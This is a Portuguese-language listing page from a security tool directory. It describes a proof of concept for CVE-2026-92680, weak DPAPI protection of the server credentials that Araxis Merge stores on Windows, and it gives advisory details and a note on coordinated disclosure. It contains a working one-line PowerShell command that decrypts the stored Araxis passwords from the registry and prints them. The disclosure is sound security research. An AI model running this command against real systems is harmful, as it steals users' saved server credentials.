Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-92680 — Proof-of-concept que descriptografa as credenciais de servidor protegidas por DPAPI do Araxis Merge (CVE-2026-92680), demonstrando armazenamento de credenciais insuficientemente protegido no Windows. | Kitploit
Ferramentas/GitHubGitHub/grepstrength/cve-2026-92680
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoCriptografia
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

Proof-of-concept que descriptografa as credenciais de servidor protegidas por DPAPI do Araxis Merge (CVE-2026-92680), demonstrando armazenamento de credenciais insuficientemente protegido no Windows.

Ver Repositório
11há 0 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-92680

O Araxis Merge para Windows armazena credenciais de servidor com DPAPI com pOptionalEntropy definido como NULL. Isso permite que qualquer código em execução no mesmo contexto de usuário as descriptografe.

Writeup completo: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: Credenciais insuficientemente protegidas
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
FornecedorAraxis Ltd.
AfetadoAraxis Merge para Windows 2011.4074 até 2026.0
Corrigido em2026.1
Aviso do fornecedorMerge-SA-26-00
Reportado2026-08-18
Divulgado2026-XX-XX
RelatorgrepStrength

Prova de Conceito

Isso descriptografará e analisará HKCU\Software\Araxis\Merge\7.1\Passwords. Isso deve ser executado como o mesmo usuário do Windows que originalmente armazenou as credenciais.

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

Notas

Todos os testes foram realizados em sistemas de propriedade da grepStength Security usando apenas credenciais sintéticas. Isso foi reportado à Araxis Ltd. e divulgado publicamente após a disponibilização de uma correção.

Licença

MIT

Baixar ferramenta